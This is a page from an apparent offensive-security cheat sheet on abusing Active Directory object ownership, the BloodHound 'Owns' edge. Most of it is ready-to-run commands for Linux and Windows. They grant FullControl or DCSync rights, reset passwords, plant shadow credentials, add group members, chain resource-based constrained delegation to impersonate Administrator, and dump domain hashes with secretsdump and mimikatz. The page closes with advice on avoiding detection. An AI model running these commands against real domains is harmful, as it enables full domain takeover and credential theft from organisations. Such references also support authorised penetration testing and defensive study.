🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / Owns

Owns

Source is the owner of the target object; owners implicitly have WriteDacl and can grant themselves any right

Applies to: User/Group/Computer β†’ User, Group, Computer, Domain, GPO

Linux Abuse

Owning an object means you can write to the DACL without needing WriteDacl explicitly.

Grant FullControl on target User, then exploit

# Grant self FullControl (owner can always write DACL)
dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

# Option 1: Reset password
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'

# Option 2: Shadow credentials
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-user> -dc-ip <dc-ip>

Grant FullControl on target Group, then add self

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> add groupMember '<target-group>' '<username>'

Grant DCSync on Domain object

dacledit.py -action write -rights DCSync \
    -principal <username> \
    -target-dn 'DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>

Target: Computer β€” RBCD via granted FullControl

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-computer>,CN=Computers,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

addcomputer.py -computer-name 'ATTACKPC$' -computer-pass '<new-password>' -dc-ip <dc-ip> '<domain>/<username>:<password>'
rbcd.py -f ATTACKPC -t <target-computer> -dc-ip <dc-ip> '<domain>/<username>:<password>'
getST.py -spn cifs/<target-computer>.<domain> -impersonate Administrator -dc-ip <dc-ip> '<domain>/ATTACKPC$:<new-password>'
export KRB5CCNAME=Administrator@cifs_<target-computer>.<domain>@<domain>.ccache
secretsdump.py -k -no-pass <target-computer>.<domain>

Windows Abuse

Grant FullControl on target

Add-DomainObjectAcl -TargetIdentity '<target-user>' -PrincipalIdentity '<username>' -Rights All -Credential $cred

Exploit β€” reset password

Set-DomainUserPassword -Identity <target-user> \
    -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred

Exploit β€” DCSync (target is Domain)

Add-DomainObjectAcl -TargetIdentity '<domain>' -PrincipalIdentity '<username>' -Rights DCSync -Credential $cred
# Then run mimikatz or secretsdump

mimikatz DCSync

mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Opsec

  • DACL writes by an owner account are logged (4670) but appear less suspicious than a non-owner modifying permissions
  • DCSync traffic (DrsReplicaSync/DrsGetNCChanges) is detectable via network monitoring β€” perform from a host that normally replicates if possible